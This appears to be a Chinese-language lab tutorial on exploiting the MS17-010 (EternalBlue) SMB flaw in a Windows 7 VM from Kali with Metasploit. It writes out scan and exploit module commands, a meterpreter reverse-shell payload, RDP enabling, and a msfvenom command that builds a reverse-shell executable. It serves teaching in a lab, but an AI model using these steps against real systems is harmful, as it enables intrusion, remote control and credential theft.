介绍
? ? ? MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。
MS17-010(永恒之蓝)漏洞简介
? ? ? 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。
? ??永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
目录
1. 前提
2. 开启模块
3. 查找漏洞
4. 设置模块
5. 设置参数并开始攻击
6. 攻击成功及反馈
7. 获取靶机权限
8. 附加
1. 前提
???①kali攻击机与Win7系统在同一局域网的同一网段上;
? ?②能相互ping通。
? ? Kali信息:
? ? 网卡使用VMnet8,通过物理机可知:
? ? Win7信息:
? 测试下网络是否能ping通:
?2.?开启模块
? ? ?打开kali,利用msf框架进行渗透,先查看kali数据库是否开启:
service postgresql status
? ? 下图为没有开启,还可以设置postgresql,开机自启:
update-rc.d postgresql enable
?3. 查找漏洞
? ? 首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启;?
4. 设置模块?
? ?打开metasploit搜索ms17-010;
? ①进入msfconsole (每次界面随机,不固定)
? ②初始化数据库??msfdb init
??③下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。
? 关注两个:扫描漏洞? ??auxiliary/scanner/smb/smb_ms17_010;
? ? ? ? ? ? ? ? ? ? 漏洞利用? ?exploit/windows/smb/ms17_010_eternalblue;
?5.?设置参数并开始攻击
? ??选择漏洞验证扫描工具并设置参数;
? ? ①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块
? ? ②show options:查看设置
? ?③set rhost 靶机ip(192.168.137.140)
? ?④exploit 运行
? ?选择攻击模块并设置参数;
? ①use exploit/windows/smb/ms17_010_eternalblue //选择模块
? ②options //查看详细信息
? ?③set payload windows/x64/meterpreter/reverse_tcp //选择荷载
? ?④set rhost 靶机ip(Win7:192.168.137.140)
? ?⑤set lhost 攻击机ip(kali:192.168.137.134)
?6.?攻击成功及反馈
? ??exploit //运行攻击
7.?获取靶机权限
? ?①run getgui -e // 开启靶机3389端口(远程桌面用)
? ?②查看系统信息、提权添加账户以及获取密码等
? ?输入shell进入目标系统 shell
? ?chcp 65001 //解决shell后windows终端乱码
? ?sysconfig? //查看靶机系统信息
附加:
? ? 当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。
? ? ① 生成一个被控端payload1.exe,再启动Metasploit
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe
??②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)
? ③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;
? sessions命令可显示所有的会话,以查看目标机的信息。
?下面送上两张常用命令的图片
至此,两种方式对靶机已成功渗透。
|